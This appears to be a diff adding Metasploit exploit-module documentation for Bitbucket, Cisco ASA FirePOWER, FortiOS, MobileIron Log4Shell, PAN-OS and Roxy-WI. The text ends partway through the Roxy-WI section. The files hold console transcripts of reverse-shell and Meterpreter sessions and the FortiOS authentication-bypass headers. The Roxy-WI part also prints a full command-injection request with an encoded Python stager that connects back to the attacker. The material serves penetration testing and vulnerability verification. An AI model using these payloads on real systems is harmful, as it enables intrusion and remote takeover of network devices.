+5. You should get a shell.
+
+## Options
+
+### USERNAME
+
+An optional username to authenticate to Bitbucket with
+
+### PASSWORD
+
+An optional password to authenticate to Bitbucket with
+
+### Bitbucket version 8.2.1 on Ubuntu 22.04
+
+```
+msf6 > use exploit/linux/http/bitbucket_git_cmd_injection
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216
+rhost => 192.168.140.216
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Searching Bitbucket for publicly accessible repository
+[+] Found public repo 'repo_name' in project 'TEST'!
+[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t
+[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t
+[*] Sending payload to 192.168.140.216 (Wget/1.21.2)
+[*] Sending stage (3020772 bytes) to 192.168.140.216
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: atlbitbucket
+meterpreter > sysinfo
+Computer     : 192.168.140.216
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authenticated command injection vulnerability affecting
+Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
+ASDM web server and lands in the FirePower Services SFR module's Linux virtual
+machine as the root user. Access to the virtual machine allows the attacker to
+pivot to the inside network, and access the outside network. Also, the SFR
+virtual machine is running snort on the traffic flowing through the ASA, so
+the attacker should have access to this diverted traffic as well.
+
+This module requires ASDM credentials in order to traverse the ASDM interface.
+A similar attack can be performed via Cisco CLI (over SSH), although that isn't
+implemented here. This attack also assumes the module is installed and
+configured.
+
+Finally, it's worth noting that this attack bypasses the effects of the
+`lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
+available but this attack makes it available).
+
+Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
+support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
+and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
+versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
+receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
+
+### Setup
+
+Cisco ASA that support the FirePOWER Services module are, to our knowledge,
+strictly hardware firewalls and not capable of being emulated. As such,
+testing requires a physical device. Once a device is acquired, you'll
+additionally need access to Cisco downloads of ASDM, ASA software, and the
+FirePOWER Services Software for ASA. Unfortunately, Cisco hides these
+behind a paywall (or a "contract" wall).
+
+However, if you do acquire a Cisco ASA that supports the FirePOWER Services
+module, then it will likely come with the module pre-installed. These systems
+do support downgrading of the module via uninstall and reinstallation. If
+you need to follow that course, then I found the following [guide](https://www.cisco.com/c/en/us/support/docs/security/asa-firepower-services/118644-configure-firepower-00.html#anc5) to be an excellent guide that
+demonstrates how to install the FirePOWER module from boot image through
+full installation.
+
+This particular module exploits the FirePOWER module via ASDM, so you'll need
+that installed and running as well. Likely, the ASA will have an ASDM binary
+package already installed, but if not you'll need to download that from Cisco
+and copy it onto the ASA. However, once that is complete, you can run the
+following commands to start ASDM and enable it on the inside/outside network.
+
+```
+asdm image disk0:/asdm<version>.bin
+http server enable
+http network mask inside
+http network mask outside
+```
+
+Where network and mask are who you want to be able to access it and inside
+is the zone. E.g. "0.0.0.0 0.0.0.0 outside" is the internet. And that should
+satisfy the pre-requisites for exploitation (ASDM+sfr).
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/linux/http/cisco_asax_sfr_rce`
+* Do: `set USERNAME <username>`
+* Do: `set PASSWORD <password>`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+### USERNAME
+
+The username to authenticate with the ASDM http web server with.
+
+### PASSWORD
+
+The password to authenticate with the ASDM http web server with.
+
+## Scenarios
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a root shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.21:43056 ) at 2022-04-21 12:49:15 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a Meterpreter shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.2:8080/FeB2t5vKpa
+[*] Client 10.0.0.21 (curl/7.48.0) requested /FeB2t5vKpa
+[*] Sending payload to 10.0.0.21 (curl/7.48.0)
+[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.21:43058 ) at 2022-04-21 12:51:44 -0700
+[*] Command Stager progress - 100.00% done (111/111 bytes)
+[*] Server stopped.
+
+meterpreter > shell
+Process 6315 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS (firewall)
+FortiProxy (web proxy), and FortiSwitch Manager products. The vulnerability allows remote, unauthenticated user to
+bypass authentication and gain access to the administrative interface of these products by using a specially
+crafted http/s request.
+
+On October 3, 2022, Fortinet released a software update that addressed this vulnerability (CVE-2022-40684).
+
+The following products are affected:
+
+- FortiOS 7.0.0 to 7.0.6
+- FortiOS 7.2.0 to 7.2.1
+- FortiProxy 7.0.0 to 7.0.6
+- FortiProxy 7.2.0
+- FortiSwitchManager 7.0.0
+- FortiSwitchManager 7.2.0
+
+### Exploitation
+
+This module will abuse the authentication bypass vulnerability in the affected products to add a new ssh public
+key in the authorized keys of the target user (if no user is provied it'll try to detect it) and then connect
+over ssh to the target system (if no ssh private key is provided this module will automatically generate one).
+
+To do so it will add the following header in all HTTP requests:
+```
+User-Agent: Report Runner
+Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
+```
+
+This module doesn't intend to overwrite the ssh keys already configured in the target system, it intends to
+**add** a new key in the last slot, if it is available or overwriting it.
+
+Even though the `check` detects the system as vulnerable, it performs a further validation if the ssh port is open and will fail otherwise.
+
+After a successful exploitation it will remove the just added key as a clean-up process. We assume it is the last key.
+
+## Verification Steps
+Confirm that functionality works:
+
+1. Start `msfconsole`
+1. `use exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684`
+1. set `RHOSTS`
+1. set `HttpTrace true` (optional)
+1. set `SSH_DEBUG true` (optional)
+1. set `VERBOSE true` (optional)
+1. `exploit`
+1. Confirm you have now a cmd session
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Fotigate API (Default: `/`).
+
+### USERNAME (required)
+
+The username of the targed user (Default: `admin`).
+
+### PRIVATE_KEY (optional)
+
+The path for the SSH private key to be used to authenticate. It must be in PEM format.
+
+Example how to generate it:
+```
+ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
+```
+
+### KEY_PASS (optional)
+
+The password for a given SSH private key (if it has one).
+
+### SSH_RPORT (required)
+
+The SSH port to connnect to (Default: `22`)
+
+## Scenarios
+
+### vulnerable application version and OS
+This module has been tested successfully on FortiGate v7.2.0.
+
+```
+msf6 exploit(linux/http/fortinet_authentication_bypass_cve_2022_40684) > exploit 
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking XXX.XXX.XXX.XXX:443
+[+] The target appears to be vulnerable. Target seems vulnerable
+[*] Executing exploit on Interactive SSH
+[*] Establishing SSH connection
+[*] SSH session 1 opened (172.25.226.18:38791 -> XXX.XXX.XXX.XXX:22) at 2022-10-15 04:00:41 +0200
+
+FW01 #  get sys status
+Version: FortiGate-100F v7.2.0,build1157,220331 (GA.F)
+Firmware Signature: certified 
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+### Description
+MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
+will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
+command execution in the context of the tomcat user.
+
+This module will start an LDAP server that the target will need to connect to.
+
+### Setup
+Once MobileIron Core is installed, no configuration needs to take place. The application is vulnerable out of the box.
+
+### MobileIron Core Appliance ISO Installation on VMWare Fusion
+
+1. Obtain a `mobileiron-##.#.#.#-##.iso` file, the following steps utilize `mobileiron-10.6.0.0-23.iso`.
+2. Use the ISO to create "A New Virtual Machine".
+3. Customize the VM settings to your liking. I gave the VM 4gb RAM, 4 cores, and changed the network adapter to a bridged mode
+so that I can hit it over the network.
+4. Boot the new virtual machine.
+5. Type `vm-install` at the `boot:` prompt.
+6. Wait patiently while the VM reboots and begins the install process. The system *will* reboot when installation completes.
+7. When prompted with `Continue with configuration dialog?`, type `yes`
+8. Type `q` to clear the license from the screen.
+9. Accept the End User License Agreement by typing `yes`
+10. Enter a Company Name / contact / email of your choosing. They don't matter.
+11. Configure an enable password (e.g. `Labpass1`)
+12. Enter an admin user name (e.g. `albinolobster`)
+13. Enter and confirm an admin password (e.g. `Labpass1`)
+14. Select `a` for the management interface
+15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`)
+16. Enter your test networks default gateway (e.g. `10.9.49.1`)
+17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a
+static DNS enty to my lab network's router.
+18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`)
+19. Enter blank entries for name server 2 and 3.
+20. `yes` to enable remote shell access (why not, right?)
+21. `no` to configuring NTP
+22. `no` to configuring system clock
+23. `yes` to commit changes
+24. Type `reload` to restart the system and `yes`, when prompted, to both saving the configuration and proceeding with the reload
+25. When the system has restarted, you should now have a vulnerable install of MobileIron Core.
+26. Visit `https://ipaddr` to ensure the HTTP server has fully loaded
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/http/mobileiron_core_log4shell`
+3. Set the `RHOSTS`, `LHOST`, and `SRVHOST`
+4. Do: `run`
+5. If the target is vulnerable, the payload should be executed
+
+## Options
+
+## Scenarios
+
+### MobileIron Core 11.2.0.0-31
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.100
+RHOSTS => 10.9.49.100
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.100:48004) at 2022-07-29 09:46:14 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux hackercat.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### MobileIron Core 10.6.0.0-23
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.101
+RHOSTS => 10.9.49.101
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.101:35304) at 2022-07-29 10:19:58 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux lobster.example.com 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 10.9.49.101 - Command shell session 1 closed.
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
+< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
+Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
+user inputs in the "op" request allows an attacker to inject commands.
+
+A Palo Alto Firewall demo VM can be requested at the following
+[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
+next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
+administrator password.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/panos_auth_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### PAN-OS 10.0.0
+```
+msf6 > use linux/http/panos_auth_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
+rhosts => 192.168.2.196
+msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
+PASSWORD => N0tpassword!
+msf6 exploit(linux/http/panos_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.114:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating...
+[+] Successfully obtained api key
+[+] The target is vulnerable.
+[*] Exploiting...
+[*] Sending stage (989032 bytes) to 192.168.2.196
+[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
+[*] Command Stager progress - 100.00% done (1111/1111 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : PA-VM-10-0-0.home
+OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,392 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0.
+Successful exploitation results in remote code execution under the context of the web server user.
+
+Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
+
+### Setup
+
+Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
+
+First grab a vulnerable copy of the code from the release pages at https://github.com/hap-wi/roxy-wi/releases.
+You will likely want to grab version 6.1.0.0 from https://github.com/hap-wi/roxy-wi/archive/refs/tags/v6.1.0.0.tar.gz
+
+Next follow the installation instructions at https://roxy-wi.org/installation.py#manual and be sure to replace `apache`
+with `www-data` where applicable if your using Debian or Ubuntu (they call this out in their instructions however
+it can be a bit hard to find which is why I'm noting it here).
+
+Once you are done you should have a working copy of Roxy-Wi. Note that for some reason the login page didn't work for me
+in testing, however everything needed to test this module should be set up and operating as expected.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/roxy_wi_exec`
+4. Set `RHOST` to the address of the target Roxy-WI machine.
+5. Set `LHOST` to the address of your attacking machine.
+8. Run `exploit`
+9. Do: `run`
+10. You should get a shell as the user running the Roxy-WI server.
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### TARGETURI
+
+The base path to Roxy-WI. The default value is `/`.
+
+## Scenarios
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Unix In-Memory Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=iufmgha&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 18:46:55 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 760
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20echo%20exec\%28__import__\%28\%27base64\%27\%29.b64decode\%28__import__\%28\%27codecs\%27\%29.getencoder\%28\%27utf-8\%27\%29\%28\%27aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yMi4yMzAuMTQ1Jyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc%2bSScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK\%27\%29\%5b0\%5d\%29\%29%20%7c%20exec%20%24%28which%20python%20%7c%7c%20which%20python3%20%7c%7c%20which%20python2%29%20-%20%3b%23&alert_consumer=gumovpt&backend_server=127.0.0.1
+    [*] Sending stage (40164 bytes) to 172.22.230.145
+    [*] Meterpreter session 1 opened (172.22.230.145:4444 -> 172.22.230.145:41506) at 2022-07-25 13:46:56 -0500
+    ####################
+    # Response:
+    ####################
+    No response received
+    
+    meterpreter > getuid
+    Server username: www-data
+    meterpreter > sysinfo
+    Computer     : gwillcox-Virtual-Machine
+    OS           : Linux 5.15.0-41-generic #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022
+    Architecture : x64
+    Meterpreter  : python/linux
+    meterpreter > pwd
+    /var/www/haproxy-wi/app
+    meterpreter > ls
+    Listing: /var/www/haproxy-wi/app
+    ================================
+    
+    Mode              Size    Type  Last modified              Name
+    ----              ----    ----  -------------              ----
+    100664/rw-rw-r--  83      fil   2022-06-30 02:43:57 -0500  .htaccess
+    040755/rwxr-xr-x  4096    dir   2022-07-25 13:36:33 -0500  __pycache__
+    100775/rwxrwxr-x  12822   fil   2022-06-30 02:43:57 -0500  add.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  certs
+    100775/rwxrwxr-x  4745    fil   2022-06-30 02:43:57 -0500  config.py
+    100775/rwxrwxr-x  33194   fil   2022-06-30 02:43:57 -0500  create_db.py
+    100775/rwxrwxr-x  14945   fil   2022-06-30 02:43:57 -0500  db_model.py
+    100775/rwxrwxr-x  64688   fil   2022-06-30 02:43:57 -0500  funct.py
+    100775/rwxrwxr-x  913     fil   2022-06-30 02:43:57 -0500  ha.py
+    100775/rwxrwxr-x  8544    fil   2022-06-30 02:43:57 -0500  hapservers.py
+    100775/rwxrwxr-x  3008    fil   2022-06-30 02:43:57 -0500  history.py
+    100775/rwxrwxr-x  7145    fil   2022-06-30 02:43:57 -0500  login.py
+    100775/rwxrwxr-x  1696    fil   2022-06-30 02:43:57 -0500  logs.py
+    100775/rwxrwxr-x  1598    fil   2022-06-30 02:43:57 -0500  metrics.py
+    100775/rwxrwxr-x  966     fil   2022-06-30 02:43:57 -0500  nettools.py
+    100775/rwxrwxr-x  181104  fil   2022-06-30 02:43:57 -0500  options.py
+    100775/rwxrwxr-x  4096    fil   2022-06-30 02:43:57 -0500  overview.py
+    100775/rwxrwxr-x  1884    fil   2022-06-30 02:43:57 -0500  portscanner.py
+    100775/rwxrwxr-x  1125    fil   2022-06-30 02:43:57 -0500  provisioning.py
+    100644/rw-r--r--  274432  fil   2022-07-25 13:41:13 -0500  roxy-wi.db
+    100775/rwxrwxr-x  750     fil   2022-06-30 02:43:57 -0500  runtimeapi.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  scripts
+    100775/rwxrwxr-x  2486    fil   2022-06-30 02:43:57 -0500  sections.py
+    100775/rwxrwxr-x  1580    fil   2022-06-30 02:43:57 -0500  servers.py
+    100775/rwxrwxr-x  1826    fil   2022-06-30 02:43:57 -0500  smon.py
+    100775/rwxrwxr-x  103924  fil   2022-06-30 02:43:57 -0500  sql.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  templates
+    100775/rwxrwxr-x  1361    fil   2022-06-30 02:43:57 -0500  users.py
+    100775/rwxrwxr-x  4150    fil   2022-06-30 02:43:57 -0500  versions.py
+    100775/rwxrwxr-x  2076    fil   2022-06-30 02:43:57 -0500  viewlogs.py
+    100775/rwxrwxr-x  1150    fil   2022-06-30 02:43:57 -0500  viewsttats.py
+    100775/rwxrwxr-x  1819    fil   2022-06-30 02:43:57 -0500  waf.py
+    
+    meterpreter > 
+```
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux Dropper Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > set Target 1 
+    Target => 1
+    msf6 exploit(linux/http/roxy_wi_exec) > set payload linux/x64/shell/reverse_tcp 
+    payload => linux/x64/shell/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
